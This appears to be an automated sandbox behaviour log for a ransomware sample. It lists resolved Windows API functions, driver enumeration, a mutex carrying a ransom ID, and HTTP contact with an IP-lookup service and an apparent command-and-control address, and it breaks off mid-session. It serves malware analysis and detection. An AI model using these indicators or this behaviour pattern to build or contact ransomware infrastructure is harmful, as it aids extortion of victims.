Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x754ff450 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x754ff440 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x754fee70 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineA, address_out = 0x754a4cb0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x754a4f00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x754a8820 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x775029e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77501ec0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x754a5110 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x754a5c40 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x754a6b10 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x754a51f0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x754a5330 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x754fef60 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x774cfb90 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x754a5320 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x754a5070 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x754ff180 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x754a5da0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x754fea20 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x754a5530 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x754a4eb0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x754a4c20 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x754a5930 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x754a5960 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x754a68d0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x754a6720 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x754febb0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x754fea10 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x754a6820 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x754a6850 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x754a6870 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x754a6830 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x754a50d0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x774eb2d0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x774eb250 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x754a57f0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x754a59c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x754a4ca0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x754a5160 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x754a4d10 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x754a5ac0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OutputDebugStringW, address_out = 0x754a5d10 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x774e2dc0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x774df630 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x754a53b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x774fa790 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x754a5a60 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x754ff500 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxW, address_out = 0x75aedb70 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = RtlUnwind, address_out = 0x77502d30 True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x73d6c544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x754febc0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventExW, address_out = 0x754feb20 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreExW, address_out = 0x754feb80 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadStackGuarantee, address_out = 0x754a6700 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x754a6d30 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolTimer, address_out = 0x774ed7c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x774eb840 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x774eb740 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWait, address_out = 0x754a6d70 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolWait, address_out = 0x774ec0b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWait, address_out = 0x774ebe10 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x77512b20 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x77508e50 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x775052f0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalProcessorInformation, address_out = 0x754a71b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x754a4510 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x75e0d900 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesEx, address_out = 0x754a49a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringEx, address_out = 0x754a7050 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatEx, address_out = 0x754a7760 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoEx, address_out = 0x754a7190 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatEx, address_out = 0x754a7780 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLocaleName, address_out = 0x754a72c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocaleName, address_out = 0x754a7440 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x754a7480 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentPackageId, address_out = 0x75d9e260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount64, address_out = 0x754a0db0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x754e7140 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateMutexW, address_out = 0x754feb70 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeW, address_out = 0x754feed0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VerSetConditionMask, address_out = 0x775048b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x754feca0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x754fdd50 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSection, address_out = 0x774faf20 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemDirectoryW, address_out = 0x754a5490 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateThread, address_out = 0x754a6800 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VerifyVersionInfoW, address_out = 0x754e26c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForMultipleObjects, address_out = 0x754fec80 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExpandEnvironmentStringsW, address_out = 0x754a4a40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x754a4610 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetHandleInformation, address_out = 0x754feae0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatA, address_out = 0x754e70c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreatePipe, address_out = 0x754a4590 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32FirstW, address_out = 0x754df750 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32NextW, address_out = 0x754df8f0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x754dedc0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReadFile, address_out = 0x754ff090 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x754fedf0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpW, address_out = 0x754a6bb0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MoveFileW, address_out = 0x754de500 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x754fed70 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x754fee40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFileAttributesW, address_out = 0x754ff100 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetNativeSystemInfo, address_out = 0x754a5130 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameW, address_out = 0x754d32c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDiskFreeSpaceW, address_out = 0x754feeb0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetWindowsDirectoryW, address_out = 0x754a5730 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVolumeInformationW, address_out = 0x754ff020 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpiA, address_out = 0x754a6bd0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpiW, address_out = 0x754a6bf0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThread, address_out = 0x754a46b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatW, address_out = 0x754e71a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnmapViewOfFile, address_out = 0x754a68f0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MapViewOfFile, address_out = 0x754a5be0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileSize, address_out = 0x754fef30 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableW, address_out = 0x754a4fb0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyA, address_out = 0x754e7060 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x754a50b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileMappingW, address_out = 0x754a44b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x754a6c50 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadCursorW, address_out = 0x75aaab40 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = BeginPaint, address_out = 0x75ab2fb0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = wsprintfW, address_out = 0x75a9f440 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMessageW, address_out = 0x75aafea0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = RegisterClassExW, address_out = 0x75aa84a0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadIconW, address_out = 0x75aa8420 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = wsprintfA, address_out = 0x75a9faa0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DestroyWindow, address_out = 0x73ef1c10 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxA, address_out = 0x75aed740 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = EndPaint, address_out = 0x75ab32d0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = TranslateMessage, address_out = 0x75aaf900 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ShowWindow, address_out = 0x75ab3ee0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CreateWindowExW, address_out = 0x75aa8780 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SendMessageW, address_out = 0x75a907d0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DispatchMessageW, address_out = 0x75aa4840 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefWindowProcW, address_out = 0x73ef0140 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = UpdateWindow, address_out = 0x75a92b80 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetForegroundWindow, address_out = 0x75ab3420 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CharUpperBuffW, address_out = 0x75af7670 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SetWindowLongW, address_out = 0x73ef1ab0 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = TextOutW, address_out = 0x73f97610 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = AllocateAndInitializeSid, address_out = 0x76d0f440 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCreateKeyExW, address_out = 0x76d0f4f0 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x76d0ed60 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = FreeSid, address_out = 0x76d0fa80 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptExportKey, address_out = 0x76d0f700 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptAcquireContextW, address_out = 0x76d0fa40 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGetKeyParam, address_out = 0x76d22db0 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptReleaseContext, address_out = 0x76d0fbc0 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptImportKey, address_out = 0x76d0f6a0 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptEncrypt, address_out = 0x76d22cf0 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGenKey, address_out = 0x76d13430 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptDestroyKey, address_out = 0x76d0fa60 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameW, address_out = 0x76d0f890 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExW, address_out = 0x76d0e5a0 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x76d0e580 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x76d0f530 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteW, address_out = 0x742a42e0 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetSpecialFolderPathW, address_out = 0x742a12f0 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x742a4730 True 1
Fn
Get Address c:\windows\syswow64\crypt32.dll function = CryptStringToBinaryA, address_out = 0x76bd2d10 True 1
Fn
Get Address c:\windows\syswow64\crypt32.dll function = CryptBinaryToStringA, address_out = 0x76b7c740 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetCloseHandle, address_out = 0x73b8d000 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpAddRequestHeadersW, address_out = 0x73c141c0 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpSendRequestW, address_out = 0x73ba9490 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetConnectW, address_out = 0x73b8e000 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpOpenRequestW, address_out = 0x73bfbdd0 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenW, address_out = 0x73b9e9e0 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetReadFile, address_out = 0x73bb3a70 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumDeviceDrivers, address_out = 0x73fc1350 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = GetDeviceDriverBaseNameW, address_out = 0x73fc13b0 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = RtlComputeCrc32, address_out = 0x77570cf0 True 5
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGenRandom, address_out = 0x76d10730 True 125
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe filename = C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe, protection = PAGE_WRITECOPY, maximum_size = 0 True 1
Fn
Map C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe process_name = c:\users\fd1hvy\appdata\local\temp\phfw.exe, desired_access = FILE_MAP_COPY True 1
Fn
Driver (508)
»
Operation Driver Additional Information Success Count Logfile
Enumerate - load_addresses = 1703688 True 2
Fn
Enumerate - load_addresses = 7012352 True 2
Fn
Enumerate - load_addresses = 1703528 True 2
Fn
Enumerate - load_addresses = 34209792 True 2
Fn
Enumerate - load_addresses = 1703540 True 1
Fn
Enumerate - load_addresses = 34471936 True 1
Fn
Get Name - load_address = 2728484864 True 4
Fn
Get Name - load_address = 2737434624 True 4
Fn
Get Name - load_address = 2738880512 True 4
Fn
Get Name - load_address = 3246260224 True 4
Fn
Get Name - load_address = 3246850048 True 4
Fn
Get Name - load_address = 3247243264 True 4
Fn
Get Name - load_address = 3247439872 True 4
Fn
Get Name - load_address = 3247570944 True 4
Fn
Get Name - load_address = 3248029696 True 4
Fn
Get Name - load_address = 3248226304 True 4
Fn
Get Name - load_address = 3248357376 True 4
Fn
Get Name - load_address = 3242196992 True 4
Fn
Get Name - load_address = 3242655744 True 4
Fn
Get Name - load_address = 3243573248 True 4
Fn
Get Name - load_address = 3243638784 True 4
Fn
Get Name - load_address = 3243704320 True 4
Fn
Get Name - load_address = 3244425216 True 4
Fn
Get Name - load_address = 3245146112 True 4
Fn
Get Name - load_address = 3246063616 True 4
Fn
Get Name - load_address = 3246194688 True 4
Fn
Get Name - load_address = 3249733632 True 4
Fn
Get Name - load_address = 3249930240 True 4
Fn
Get Name - load_address = 3248488448 True 4
Fn
Get Name - load_address = 3249274880 True 4
Fn
Get Name - load_address = 3249340416 True 4
Fn
Get Name - load_address = 3249471488 True 4
Fn
Get Name - load_address = 3249602560 True 4
Fn
Get Name - load_address = 3249995776 True 4
Fn
Get Name - load_address = 3250126848 True 4
Fn
Get Name - load_address = 3250192384 True 4
Fn
Get Name - load_address = 3262971904 True 4
Fn
Get Name - load_address = 3250585600 True 4
Fn
Get Name - load_address = 3250782208 True 4
Fn
Get Name - load_address = 3250913280 True 4
Fn
Get Name - load_address = 3251109888 True 4
Fn
Get Name - load_address = 3251765248 True 4
Fn
Get Name - load_address = 3251896320 True 4
Fn
Get Name - load_address = 3252289536 True 4
Fn
Get Name - load_address = 3252420608 True 4
Fn
Get Name - load_address = 3252617216 True 4
Fn
Get Name - load_address = 3253207040 True 4
Fn
Get Name - load_address = 3253338112 True 4
Fn
Get Name - load_address = 3253469184 True 4
Fn
Get Name - load_address = 3253731328 True 4
Fn
Get Name - load_address = 3256156160 True 4
Fn
Get Name - load_address = 3256221696 True 4
Fn
Get Name - load_address = 3257532416 True 4
Fn
Get Name - load_address = 3258122240 True 4
Fn
Get Name - load_address = 3258318848 True 4
Fn
Get Name - load_address = 3261071360 True 4
Fn
Get Name - load_address = 3261530112 True 4
Fn
Get Name - load_address = 3261726720 True 4
Fn
Get Name - load_address = 3262513152 True 4
Fn
Get Name - load_address = 3267035136 True 4
Fn
Get Name - load_address = 3267493888 True 4
Fn
Get Name - load_address = 3267821568 True 4
Fn
Get Name - load_address = 3268018176 True 4
Fn
Get Name - load_address = 3268214784 True 4
Fn
Get Name - load_address = 3268345856 True 4
Fn
Get Name - load_address = 3268935680 True 4
Fn
Get Name - load_address = 3263627264 True 4
Fn
Get Name - load_address = 3263823872 True 4
Fn
Get Name - load_address = 3263954944 True 4
Fn
Get Name - load_address = 3264020480 True 4
Fn
Get Name - load_address = 3264086016 True 4
Fn
Get Name - load_address = 3264151552 True 4
Fn
Get Name - load_address = 3264282624 True 4
Fn
Get Name - load_address = 3264413696 True 4
Fn
Get Name - load_address = 3266904064 True 4
Fn
Get Name - load_address = 3268149248 True 4
Fn
Get Name - load_address = 3262578688 True 4
Fn
Get Name - load_address = 3269394432 True 4
Fn
Get Name - load_address = 3262709760 True 4
Fn
Get Name - load_address = 3262906368 True 4
Fn
Get Name - load_address = 3278700544 True 4
Fn
Get Name - load_address = 3279093760 True 4
Fn
Get Name - load_address = 3279749120 True 4
Fn
Get Name - load_address = 3271557120 True 4
Fn
Get Name - load_address = 3271753728 True 4
Fn
Get Name - load_address = 3271884800 True 4
Fn
Get Name - load_address = 3272409088 True 4
Fn
Get Name - load_address = 3272998912 True 4
Fn
Get Name - load_address = 3273129984 True 4
Fn
Get Name - load_address = 3273195520 True 4
Fn
Get Name - load_address = 3273261056 True 4
Fn
Get Name - load_address = 3273326592 True 4
Fn
Get Name - load_address = 3273654272 True 4
Fn
Get Name - load_address = 3273981952 True 4
Fn
Get Name - load_address = 3274113024 True 4
Fn
Get Name - load_address = 3274178560 True 4
Fn
Get Name - load_address = 3274309632 True 4
Fn
Get Name - load_address = 3274440704 True 4
Fn
Get Name - load_address = 3274899456 True 4
Fn
Get Name - load_address = 3275096064 True 4
Fn
Get Name - load_address = 3275554816 True 4
Fn
Get Name - load_address = 3275685888 True 4
Fn
Get Name - load_address = 3276800000 True 4
Fn
Get Name - load_address = 3277062144 True 4
Fn
Get Name - load_address = 3277127680 True 4
Fn
Get Name - load_address = 3277193216 True 4
Fn
Get Name - load_address = 3277258752 True 4
Fn
Get Name - load_address = 3277848576 True 4
Fn
Get Name - load_address = 3277914112 True 4
Fn
Get Name - load_address = 3278372864 True 4
Fn
Get Name - load_address = 3278438400 True 4
Fn
Get Name - load_address = 3283877888 True 2
Fn
Get Name - load_address = 3279945728 True 2
Fn
Get Name - load_address = 3280076800 True 2
Fn
Get Name - load_address = 3280142336 True 2
Fn
Get Name - load_address = 3280273408 True 2
Fn
Get Name - load_address = 3280338944 True 2
Fn
Get Name - load_address = 3280535552 True 2
Fn
Get Name - load_address = 3280797696 True 2
Fn
Get Name - load_address = 3281125376 True 2
Fn
Get Name - load_address = 1507262464 True 2
Fn
Get Name - load_address = 1510604800 True 2
Fn
Get Name - load_address = 1507852288 True 2
Fn
Get Name - load_address = 3283419136 True 2
Fn
Get Name - load_address = 3281256448 True 2
Fn
Get Name - load_address = 1510014976 True 2
Fn
Get Name - load_address = 1510080512 True 2
Fn
Get Name - load_address = 3282042880 True 2
Fn
Get Name - load_address = 3282239488 True 2
Fn
Get Name - load_address = 3282501632 True 2
Fn
Get Name - load_address = 3282632704 True 2
Fn
Get Name - load_address = 3282698240 True 2
Fn
Get Name - load_address = 3282829312 True 2
Fn
Get Name - load_address = 3282960384 True 2
Fn
Get Name - load_address = 2725576704 True 2
Fn
Get Name - load_address = 2726756352 True 2
Fn
Get Name - load_address = 2726952960 True 2
Fn
Get Name - load_address = 2727477248 True 2
Fn
Get Name - load_address = 2727739392 True 2
Fn
Get Name - load_address = 2727870464 True 2
Fn
Get Name - load_address = 2715811840 True 2
Fn
Get Name - load_address = 2716598272 True 2
Fn
Get Name - load_address = 2716729344 True 2
Fn
Get Name - load_address = 2717057024 True 2
Fn
Get Name - load_address = 2717253632 True 2
Fn
Get Name - load_address = 2718105600 True 2
Fn
Get Name - load_address = 2718695424 True 2
Fn
Get Name - load_address = 2719023104 True 2
Fn
Get Name - load_address = 2719154176 True 2
Fn
Get Name - load_address = 2719744000 True 2
Fn
System (12)
»
Operation Additional Information Success Count Logfile
Get Computer Name result_out = NQDPDE True 1
Fn
Sleep duration = 1000 milliseconds (1.000 seconds) True 2
Fn
Sleep duration = -1 (infinite) False 1
Fn
Get Time type = System Time, time = 2018-04-20 18:21:15 (UTC) True 1
Fn
Get Time type = Ticks, time = 164218 True 1
Fn
Get Time type = Ticks, time = 183921 True 1
Fn
Get Info type = Operating System True 1
Fn
Get Info type = Windows Directory, result_out = C:\WINDOWS True 3
Fn
Get Info type = Hardware Information True 1
Fn
Mutex (1)
»
Operation Additional Information Success Count Logfile
Create mutex_name = Global\pc_group=WORKGROUP&ransom_id=bdc31ed2b4197730 True 1
Fn
Environment (3)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data
Get Environment String name = AppData, result_out = C:\Users\FD1HVy\AppData\Roaming True 1
Fn
Network Behavior
HTTP Sessions (2)
»
Information Value
Total Data Sent 567 bytes
Total Data Received 565 bytes
Contacted Host Count 2
Contacted Hosts ipv4bot.whatismyipaddress.com, 130.204.21.137
HTTP Session #1
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Server Name ipv4bot.whatismyipaddress.com
Server Port 80
Data Sent 295
Data Received 13
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = ipv4bot.whatismyipaddress.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Add HTTP Request Headers headers = Host: ransomware.bit True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = ipv4bot.whatismyipaddress.com/ True 1
Fn
Read Response size = 10238, size_out = 13 True 1
Fn
Data
Read Response size = 10238, size_out = 0 True 1
Fn
Close Session - True 4
Fn
HTTP Session #2
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Server Name 130.204.21.137
Server Port 80
Data Sent 272
Data Received 552
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 130.204.21.137, server_port = 80 True 1
Fn
